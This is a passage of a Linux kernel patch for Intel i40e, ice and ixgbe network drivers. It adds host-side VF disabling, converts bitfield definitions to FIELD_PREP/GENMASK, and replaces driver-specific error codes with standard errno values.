+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+index c7d761426d6ce..3d3db58090ed1 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.c
+@@ -2603,6 +2603,14 @@ static int i40e_vc_enable_queues_msg(struct i40e_vf *vf, u8 *msg)
+ 	int aq_ret = 0;
+ 	int i;
+ 
++	if (vf->is_disabled_from_host) {
++		aq_ret = -EPERM;
++		dev_info(&pf->pdev->dev,
++			 "Admin has disabled VF %d, will not enable queues\n",
++			 vf->vf_id);
++		goto error_param;
++	}
++
+ 	if (!test_bit(I40E_VF_STATE_ACTIVE, &vf->vf_states)) {
+ 		aq_ret = I40E_ERR_PARAM;
+ 		goto error_param;
+@@ -4656,9 +4664,12 @@ int i40e_ndo_set_vf_link_state(struct net_device *netdev, int vf_id, int link)
+ 	struct i40e_link_status *ls = &pf->hw.phy.link_info;
+ 	struct virtchnl_pf_event pfe;
+ 	struct i40e_hw *hw = &pf->hw;
++	struct i40e_vsi *vsi;
++	unsigned long q_map;
+ 	struct i40e_vf *vf;
+ 	int abs_vf_id;
+ 	int ret = 0;
++	int tmp;
+ 
+ 	if (test_and_set_bit(__I40E_VIRTCHNL_OP_PENDING, pf->state)) {
+ 		dev_warn(&pf->pdev->dev, "Unable to configure VFs, other operation is pending.\n");
+@@ -4681,17 +4692,38 @@ int i40e_ndo_set_vf_link_state(struct net_device *netdev, int vf_id, int link)
+ 	switch (link) {
+ 	case IFLA_VF_LINK_STATE_AUTO:
+ 		vf->link_forced = false;
++		vf->is_disabled_from_host = false;
++		/* reset needed to reinit VF resources */
++		i40e_vc_reset_vf(vf, true);
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
+ 		break;
+ 	case IFLA_VF_LINK_STATE_ENABLE:
+ 		vf->link_forced = true;
+ 		vf->link_up = true;
++		vf->is_disabled_from_host = false;
++		/* reset needed to reinit VF resources */
++		i40e_vc_reset_vf(vf, true);
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
+ 		break;
+ 	case IFLA_VF_LINK_STATE_DISABLE:
+ 		vf->link_forced = true;
+ 		vf->link_up = false;
+ 		i40e_set_vf_link_state(vf, &pfe, ls);
++
++		vsi = pf->vsi[vf->lan_vsi_idx];
++		q_map = BIT(vsi->num_queue_pairs) - 1;
++
++		vf->is_disabled_from_host = true;
++
++		/* Try to stop both Tx&Rx rings even if one of the calls fails
++		 * to ensure we stop the rings even in case of errors.
++		 * If any of them returns with an error then the first
++		 * error that occurred will be returned.
++		 */
++		tmp = i40e_ctrl_vf_tx_rings(vsi, q_map, false);
++		ret = i40e_ctrl_vf_rx_rings(vsi, q_map, false);
++
++		ret = tmp ? tmp : ret;
+ 		break;
+ 	default:
+ 		ret = -EINVAL;
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+index bd497cc5303a1..97e9c34d7c6cd 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_virtchnl_pf.h
+@@ -98,6 +98,7 @@ struct i40e_vf {
+ 	bool link_forced;
+ 	bool link_up;		/* only valid if VF link is forced */
+ 	bool spoofchk;
++	bool is_disabled_from_host; /* PF ctrl of VF enable/disable */
+ 	u16 num_vlan;
+ 
+ 	/* ADq related variables */
+diff --git a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+index 1bdc70aa979dc..fe48164dce1e1 100644
+--- a/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
++++ b/drivers/net/ethernet/intel/ice/ice_adminq_cmd.h
+@@ -413,10 +413,10 @@ struct ice_aqc_vsi_props {
+ #define ICE_AQ_VSI_INNER_VLAN_INSERT_PVID	BIT(2)
+ #define ICE_AQ_VSI_INNER_VLAN_EMODE_S		3
+ #define ICE_AQ_VSI_INNER_VLAN_EMODE_M		(0x3 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH	(0x0 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_UP	(0x1 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR		(0x2 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
+-#define ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING	(0x3 << ICE_AQ_VSI_INNER_VLAN_EMODE_S)
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH	0x0U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR_UP	0x1U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_STR		0x2U
++#define ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING	0x3U
+ 	u8 inner_vlan_reserved2[3];
+ 	/* ingress egress up sections */
+ 	__le32 ingress_table; /* bitmap, 3 bits per up */
+@@ -482,11 +482,11 @@ struct ice_aqc_vsi_props {
+ #define ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_S		2
+ #define ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_M		(0xF << ICE_AQ_VSI_Q_OPT_RSS_GBL_LUT_S)
+ #define ICE_AQ_VSI_Q_OPT_RSS_HASH_S		6
+-#define ICE_AQ_VSI_Q_OPT_RSS_HASH_M		(0x3 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_TPLZ		(0x0 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_SYM_TPLZ		(0x1 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_XOR		(0x2 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
+-#define ICE_AQ_VSI_Q_OPT_RSS_JHASH		(0x3 << ICE_AQ_VSI_Q_OPT_RSS_HASH_S)
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_M		GENMASK(7, 6)
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ		0x0U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_SYM_TPLZ	0x1U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_XOR		0x2U
++#define ICE_AQ_VSI_Q_OPT_RSS_HASH_JHASH		0x3U
+ 	u8 q_opt_tc;
+ #define ICE_AQ_VSI_Q_OPT_TC_OVR_S		0
+ #define ICE_AQ_VSI_Q_OPT_TC_OVR_M		(0x1F << ICE_AQ_VSI_Q_OPT_TC_OVR_S)
+diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c
+index c051503c3a892..cc6c04a69b285 100644
+--- a/drivers/net/ethernet/intel/ice/ice_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_lib.c
+@@ -878,7 +878,8 @@ static void ice_set_dflt_vsi_ctx(struct ice_hw *hw, struct ice_vsi_ctx *ctxt)
+ 	 */
+ 	if (ice_is_dvm_ena(hw)) {
+ 		ctxt->info.inner_vlan_flags |=
+-			ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING;
++			FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				   ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING);
+ 		ctxt->info.outer_vlan_flags =
+ 			(ICE_AQ_VSI_OUTER_VLAN_TX_MODE_ALL <<
+ 			 ICE_AQ_VSI_OUTER_VLAN_TX_MODE_S) &
+@@ -1085,12 +1086,12 @@ static void ice_set_rss_vsi_ctx(struct ice_vsi_ctx *ctxt, struct ice_vsi *vsi)
+ 	case ICE_VSI_PF:
+ 		/* PF VSI will inherit RSS instance of PF */
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_PF;
+-		hash_type = ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 		break;
+ 	case ICE_VSI_VF:
+ 		/* VF VSI will gets a small RSS table which is a VSI LUT type */
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_VSI;
+-		hash_type = ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 		break;
+ 	default:
+ 		dev_dbg(dev, "Unsupported VSI type %s\n",
+diff --git a/drivers/net/ethernet/intel/ice/ice_virtchnl.c b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+index 2b4c791b6cbad..6c03ebf81ffda 100644
+--- a/drivers/net/ethernet/intel/ice/ice_virtchnl.c
++++ b/drivers/net/ethernet/intel/ice/ice_virtchnl.c
+@@ -817,8 +817,8 @@ static int ice_vc_handle_rss_cfg(struct ice_vf *vf, u8 *msg, bool add)
+ 		int status;
+ 
+ 		lut_type = ICE_AQ_VSI_Q_OPT_RSS_LUT_VSI;
+-		hash_type = add ? ICE_AQ_VSI_Q_OPT_RSS_XOR :
+-				ICE_AQ_VSI_Q_OPT_RSS_TPLZ;
++		hash_type = add ? ICE_AQ_VSI_Q_OPT_RSS_HASH_XOR :
++				ICE_AQ_VSI_Q_OPT_RSS_HASH_TPLZ;
+ 
+ 		ctx = kzalloc(sizeof(*ctx), GFP_KERNEL);
+ 		if (!ctx) {
+@@ -826,11 +826,9 @@ static int ice_vc_handle_rss_cfg(struct ice_vf *vf, u8 *msg, bool add)
+ 			goto error_param;
+ 		}
+ 
+-		ctx->info.q_opt_rss = ((lut_type <<
+-					ICE_AQ_VSI_Q_OPT_RSS_LUT_S) &
+-				       ICE_AQ_VSI_Q_OPT_RSS_LUT_M) |
+-				       (hash_type &
+-					ICE_AQ_VSI_Q_OPT_RSS_HASH_M);
++		ctx->info.q_opt_rss =
++			FIELD_PREP(ICE_AQ_VSI_Q_OPT_RSS_LUT_M, lut_type) |
++			FIELD_PREP(ICE_AQ_VSI_Q_OPT_RSS_HASH_M, hash_type);
+ 
+ 		/* Preserve existing queueing option setting */
+ 		ctx->info.q_opt_rss |= (vsi->info.q_opt_rss &
+diff --git a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+index 5b4a0abb46077..239266e9d5f12 100644
+--- a/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
++++ b/drivers/net/ethernet/intel/ice/ice_vsi_vlan_lib.c
+@@ -131,6 +131,7 @@ static int ice_vsi_manage_vlan_stripping(struct ice_vsi *vsi, bool ena)
+ {
+ 	struct ice_hw *hw = &vsi->back->hw;
+ 	struct ice_vsi_ctx *ctxt;
++	u8 *ivf;
+ 	int err;
+ 
+ 	/* do not allow modifying VLAN stripping when a port VLAN is configured
+@@ -143,19 +144,24 @@ static int ice_vsi_manage_vlan_stripping(struct ice_vsi *vsi, bool ena)
+ 	if (!ctxt)
+ 		return -ENOMEM;
+ 
++	ivf = &ctxt->info.inner_vlan_flags;
++
+ 	/* Here we are configuring what the VSI should do with the VLAN tag in
+ 	 * the Rx packet. We can either leave the tag in the packet or put it in
+ 	 * the Rx descriptor.
+ 	 */
+-	if (ena)
++	if (ena) {
+ 		/* Strip VLAN tag from Rx packet and put it in the desc */
+-		ctxt->info.inner_vlan_flags = ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH;
+-	else
++		*ivf = FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				  ICE_AQ_VSI_INNER_VLAN_EMODE_STR_BOTH);
++	} else {
+ 		/* Disable stripping. Leave tag in packet */
+-		ctxt->info.inner_vlan_flags = ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING;
++		*ivf = FIELD_PREP(ICE_AQ_VSI_INNER_VLAN_EMODE_M,
++				  ICE_AQ_VSI_INNER_VLAN_EMODE_NOTHING);
++	}
+ 
+ 	/* Allow all packets untagged/tagged */
+-	ctxt->info.inner_vlan_flags |= ICE_AQ_VSI_INNER_VLAN_TX_MODE_ALL;
++	*ivf |= ICE_AQ_VSI_INNER_VLAN_TX_MODE_ALL;
+ 
+ 	ctxt->info.valid_sections = cpu_to_le16(ICE_AQ_VSI_PROP_VLAN_VALID);
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
+index 100388968e4db..3d56481e16bc9 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_82598.c
+@@ -123,14 +123,14 @@ static s32 ixgbe_init_phy_ops_82598(struct ixgbe_hw *hw)
+ 		if (ret_val)
+ 			return ret_val;
+ 		if (hw->phy.sfp_type == ixgbe_sfp_type_unknown)
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 
+ 		/* Check to see if SFP+ module is supported */
+ 		ret_val = ixgbe_get_sfp_init_sequence_offsets(hw,
+ 							    &list_offset,
+ 							    &data_offset);
+ 		if (ret_val)
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		break;
+ 	default:
+ 		break;
+@@ -213,7 +213,7 @@ static s32 ixgbe_get_link_capabilities_82598(struct ixgbe_hw *hw,
+ 		break;
+ 
+ 	default:
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -283,7 +283,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 
+ 	/* Validate the water mark configuration */
+ 	if (!hw->fc.pause_time)
+-		return IXGBE_ERR_INVALID_LINK_SETTINGS;
++		return -EINVAL;
+ 
+ 	/* Low water mark of zero causes XOFF floods */
+ 	for (i = 0; i < MAX_TRAFFIC_CLASS; i++) {
+@@ -292,7 +292,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 			if (!hw->fc.low_water[i] ||
+ 			    hw->fc.low_water[i] >= hw->fc.high_water[i]) {
+ 				hw_dbg(hw, "Invalid water mark configuration\n");
+-				return IXGBE_ERR_INVALID_LINK_SETTINGS;
++				return -EINVAL;
+ 			}
+ 		}
+ 	}
+@@ -369,7 +369,7 @@ static s32 ixgbe_fc_enable_82598(struct ixgbe_hw *hw)
+ 		break;
+ 	default:
+ 		hw_dbg(hw, "Flow control param set incorrectly\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Set 802.3x based flow control settings. */
+@@ -438,7 +438,7 @@ static s32 ixgbe_start_mac_link_82598(struct ixgbe_hw *hw,
+ 				msleep(100);
+ 			}
+ 			if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-				status = IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++				status = -EIO;
+ 				hw_dbg(hw, "Autonegotiation did not complete.\n");
+ 			}
+ 		}
+@@ -478,7 +478,7 @@ static s32 ixgbe_validate_link_ready(struct ixgbe_hw *hw)
+ 
+ 	if (timeout == IXGBE_VALIDATE_LINK_READY_TIMEOUT) {
+ 		hw_dbg(hw, "Link was indicated but link is down\n");
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -594,7 +594,7 @@ static s32 ixgbe_setup_mac_link_82598(struct ixgbe_hw *hw,
+ 	speed &= link_capabilities;
+ 
+ 	if (speed == IXGBE_LINK_SPEED_UNKNOWN)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 
+ 	/* Set KX4/KX support according to speed requested */
+ 	else if (link_mode == IXGBE_AUTOC_LMS_KX4_AN ||
+@@ -701,9 +701,9 @@ static s32 ixgbe_reset_hw_82598(struct ixgbe_hw *hw)
+ 
+ 		/* Init PHY and function pointers, perform SFP setup */
+ 		phy_status = hw->phy.ops.init(hw);
+-		if (phy_status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++		if (phy_status == -EOPNOTSUPP)
+ 			return phy_status;
+-		if (phy_status == IXGBE_ERR_SFP_NOT_PRESENT)
++		if (phy_status == -ENOENT)
+ 			goto mac_reset_top;
+ 
+ 		hw->phy.ops.reset(hw);
+@@ -727,7 +727,7 @@ mac_reset_top:
+ 		udelay(1);
+ 	}
+ 	if (ctrl & IXGBE_CTRL_RST) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -789,7 +789,7 @@ static s32 ixgbe_set_vmdq_82598(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	rar_high = IXGBE_READ_REG(hw, IXGBE_RAH(rar));
+@@ -814,7 +814,7 @@ static s32 ixgbe_clear_vmdq_82598(struct ixgbe_hw *hw, u32 rar, u32 vmdq)
+ 	/* Make sure we are using a valid rar index range */
+ 	if (rar >= rar_entries) {
+ 		hw_dbg(hw, "RAR index %d is out of range.\n", rar);
+-		return IXGBE_ERR_INVALID_ARGUMENT;
++		return -EINVAL;
+ 	}
+ 
+ 	rar_high = IXGBE_READ_REG(hw, IXGBE_RAH(rar));
+@@ -845,7 +845,7 @@ static s32 ixgbe_set_vfta_82598(struct ixgbe_hw *hw, u32 vlan, u32 vind,
+ 	u32 vftabyte;
+ 
+ 	if (vlan > 4095)
+-		return IXGBE_ERR_PARAM;
++		return -EINVAL;
+ 
+ 	/* Determine 32-bit word position in array */
+ 	regindex = (vlan >> 5) & 0x7F;   /* upper seven bits */
+@@ -964,7 +964,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 		gssr = IXGBE_GSSR_PHY0_SM;
+ 
+ 	if (hw->mac.ops.acquire_swfw_sync(hw, gssr) != 0)
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	if (hw->phy.type == ixgbe_phy_nl) {
+ 		/*
+@@ -993,7 +993,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 
+ 		if (sfp_stat != IXGBE_I2C_EEPROM_STATUS_PASS) {
+ 			hw_dbg(hw, "EEPROM read did not pass.\n");
+-			status = IXGBE_ERR_SFP_NOT_PRESENT;
++			status = -ENOENT;
+ 			goto out;
+ 		}
+ 
+@@ -1003,7 +1003,7 @@ static s32 ixgbe_read_i2c_phy_82598(struct ixgbe_hw *hw, u8 dev_addr,
+ 
+ 		*eeprom_data = (u8)(sfp_data >> 8);
+ 	} else {
+-		status = IXGBE_ERR_PHY;
++		status = -EIO;
+ 	}
+ 
+ out:
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
+index 58ea959a44822..339e106a5732d 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_82599.c
+@@ -117,7 +117,7 @@ static s32 ixgbe_setup_sfp_modules_82599(struct ixgbe_hw *hw)
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 							IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		if (hw->eeprom.ops.read(hw, ++data_offset, &data_value))
+ 			goto setup_sfp_err;
+@@ -144,7 +144,7 @@ static s32 ixgbe_setup_sfp_modules_82599(struct ixgbe_hw *hw)
+ 
+ 		if (ret_val) {
+ 			hw_dbg(hw, " sfp module setup not complete\n");
+-			return IXGBE_ERR_SFP_SETUP_NOT_COMPLETE;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -159,7 +159,7 @@ setup_sfp_err:
+ 	usleep_range(hw->eeprom.semaphore_delay * 1000,
+ 		     hw->eeprom.semaphore_delay * 2000);
+ 	hw_err(hw, "eeprom read at offset %d failed\n", data_offset);
+-	return IXGBE_ERR_SFP_SETUP_NOT_COMPLETE;
++	return -EIO;
+ }
+ 
+ /**
+@@ -184,7 +184,7 @@ static s32 prot_autoc_read_82599(struct ixgbe_hw *hw, bool *locked,
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 					IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		*locked = true;
+ 	}
+@@ -219,7 +219,7 @@ static s32 prot_autoc_write_82599(struct ixgbe_hw *hw, u32 autoc, bool locked)
+ 		ret_val = hw->mac.ops.acquire_swfw_sync(hw,
+ 					IXGBE_GSSR_MAC_CSR_SM);
+ 		if (ret_val)
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		locked = true;
+ 	}
+@@ -400,7 +400,7 @@ static s32 ixgbe_get_link_capabilities_82599(struct ixgbe_hw *hw,
+ 		break;
+ 
+ 	default:
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EIO;
+ 	}
+ 
+ 	if (hw->phy.multispeed_fiber) {
+@@ -541,7 +541,7 @@ static s32 ixgbe_start_mac_link_82599(struct ixgbe_hw *hw,
+ 				msleep(100);
+ 			}
+ 			if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-				status = IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++				status = -EIO;
+ 				hw_dbg(hw, "Autoneg did not complete.\n");
+ 			}
+ 		}
+@@ -794,7 +794,7 @@ static s32 ixgbe_setup_mac_link_82599(struct ixgbe_hw *hw,
+ 	speed &= link_capabilities;
+ 
+ 	if (speed == IXGBE_LINK_SPEED_UNKNOWN)
+-		return IXGBE_ERR_LINK_SETUP;
++		return -EINVAL;
+ 
+ 	/* Use stored value (EEPROM defaults) of AUTOC to find KR/KX4 support*/
+ 	if (hw->mac.orig_link_settings_stored)
+@@ -861,8 +861,7 @@ static s32 ixgbe_setup_mac_link_82599(struct ixgbe_hw *hw,
+ 					msleep(100);
+ 				}
+ 				if (!(links_reg & IXGBE_LINKS_KX_AN_COMP)) {
+-					status =
+-						IXGBE_ERR_AUTONEG_NOT_COMPLETE;
++					status = -EIO;
+ 					hw_dbg(hw, "Autoneg did not complete.\n");
+ 				}
+ 			}
+@@ -927,7 +926,7 @@ static s32 ixgbe_reset_hw_82599(struct ixgbe_hw *hw)
+ 	/* Identify PHY and related function pointers */
+ 	status = hw->phy.ops.init(hw);
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Setup SFP module if there is one present. */
+@@ -936,7 +935,7 @@ static s32 ixgbe_reset_hw_82599(struct ixgbe_hw *hw)
+ 		hw->phy.sfp_setup_needed = false;
+ 	}
+ 
+-	if (status == IXGBE_ERR_SFP_NOT_SUPPORTED)
++	if (status == -EOPNOTSUPP)
+ 		return status;
+ 
+ 	/* Reset PHY */
+@@ -974,7 +973,7 @@ mac_reset_top:
+ 	}
+ 
+ 	if (ctrl & IXGBE_CTRL_RST_MASK) {
+-		status = IXGBE_ERR_RESET_FAILED;
++		status = -EIO;
+ 		hw_dbg(hw, "Reset polling failed to complete.\n");
+ 	}
+ 
+@@ -1093,7 +1092,7 @@ static s32 ixgbe_fdir_check_cmd_complete(struct ixgbe_hw *hw, u32 *fdircmd)
+ 		udelay(10);
+ 	}
+ 
+-	return IXGBE_ERR_FDIR_CMD_INCOMPLETE;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1155,7 +1154,7 @@ s32 ixgbe_reinit_fdir_tables_82599(struct ixgbe_hw *hw)
+ 	}
+ 	if (i >= IXGBE_FDIR_INIT_DONE_POLL) {
+ 		hw_dbg(hw, "Flow Director Signature poll time exceeded!\n");
+-		return IXGBE_ERR_FDIR_REINIT_FAILED;
++		return -EIO;
+ 	}
+ 
+ 	/* Clear FDIR statistics registers (read to clear) */
+@@ -1387,7 +1386,7 @@ s32 ixgbe_fdir_add_signature_filter_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flow type input\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* configure FDIRCMD register */
+@@ -1546,7 +1545,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on vm pool mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (input_mask->formatted.flow_type & IXGBE_ATR_L4TYPE_MASK) {
+@@ -1555,14 +1554,14 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		if (input_mask->formatted.dst_port ||
+ 		    input_mask->formatted.src_port) {
+ 			hw_dbg(hw, " Error on src/dst port mask\n");
+-			return IXGBE_ERR_CONFIG;
++			return -EIO;
+ 		}
+ 		break;
+ 	case IXGBE_ATR_L4TYPE_MASK:
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flow type mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch (ntohs(input_mask->formatted.vlan_id) & 0xEFFF) {
+@@ -1583,7 +1582,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on VLAN mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	switch ((__force u16)input_mask->formatted.flex_bytes & 0xFFFF) {
+@@ -1595,7 +1594,7 @@ s32 ixgbe_fdir_set_input_mask_82599(struct ixgbe_hw *hw,
+ 		break;
+ 	default:
+ 		hw_dbg(hw, " Error on flexible byte mask\n");
+-		return IXGBE_ERR_CONFIG;
++		return -EIO;
+ 	}
+ 
+ 	/* Now mask VM pool and destination IPv6 - bits 5 and 2 */
+@@ -1824,7 +1823,7 @@ static s32 ixgbe_identify_phy_82599(struct ixgbe_hw *hw)
+ 
+ 	/* Return error if SFP module has been detected but is not supported */
+ 	if (hw->phy.type == ixgbe_phy_sfp_unsupported)
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	return status;
+ }
+@@ -1863,13 +1862,13 @@ static s32 ixgbe_enable_rx_dma_82599(struct ixgbe_hw *hw, u32 regval)
+  *  Verifies that installed the firmware version is 0.6 or higher
+  *  for SFI devices. All 82599 SFI devices should have version 0.6 or higher.
+  *
+- *  Returns IXGBE_ERR_EEPROM_VERSION if the FW is not present or
+- *  if the FW version is not supported.
++ *  Return: -EACCES if the FW is not present or if the FW version is
++ *  not supported.
+  **/
+ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ {
+-	s32 status = IXGBE_ERR_EEPROM_VERSION;
+ 	u16 fw_offset, fw_ptp_cfg_offset;
++	s32 status = -EACCES;
+ 	u16 offset;
+ 	u16 fw_version = 0;
+ 
+@@ -1883,7 +1882,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 		goto fw_version_err;
+ 
+ 	if (fw_offset == 0 || fw_offset == 0xFFFF)
+-		return IXGBE_ERR_EEPROM_VERSION;
++		return -EACCES;
+ 
+ 	/* get the offset to the Pass Through Patch Configuration block */
+ 	offset = fw_offset + IXGBE_FW_PASSTHROUGH_PATCH_CONFIG_PTR;
+@@ -1891,7 +1890,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 		goto fw_version_err;
+ 
+ 	if (fw_ptp_cfg_offset == 0 || fw_ptp_cfg_offset == 0xFFFF)
+-		return IXGBE_ERR_EEPROM_VERSION;
++		return -EACCES;
+ 
+ 	/* get the firmware version */
+ 	offset = fw_ptp_cfg_offset + IXGBE_FW_PATCH_VERSION_4;
+@@ -1905,7 +1904,7 @@ static s32 ixgbe_verify_fw_version_82599(struct ixgbe_hw *hw)
+ 
+ fw_version_err:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", offset);
+-	return IXGBE_ERR_EEPROM_VERSION;
++	return -EACCES;
+ }
+ 
+ /**
+@@ -2038,7 +2037,7 @@ static s32 ixgbe_reset_pipeline_82599(struct ixgbe_hw *hw)
+ 
+ 	if (!(anlp1_reg & IXGBE_ANLP1_AN_STATE_MASK)) {
+ 		hw_dbg(hw, "auto negotiation not completed\n");
+-		ret_val = IXGBE_ERR_RESET_FAILED;
++		ret_val = -EIO;
+ 		goto reset_pipeline_out;
+ 	}
+ 
+@@ -2087,7 +2086,7 @@ static s32 ixgbe_read_i2c_byte_82599(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 		if (!timeout) {
+ 			hw_dbg(hw, "Driver can't access resource, acquiring I2C bus timeout.\n");
+-			status = IXGBE_ERR_I2C;
++			status = -EIO;
+ 			goto release_i2c_access;
+ 		}
+ 	}
+@@ -2141,7 +2140,7 @@ static s32 ixgbe_write_i2c_byte_82599(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 		if (!timeout) {
+ 			hw_dbg(hw, "Driver can't access resource, acquiring I2C bus timeout.\n");
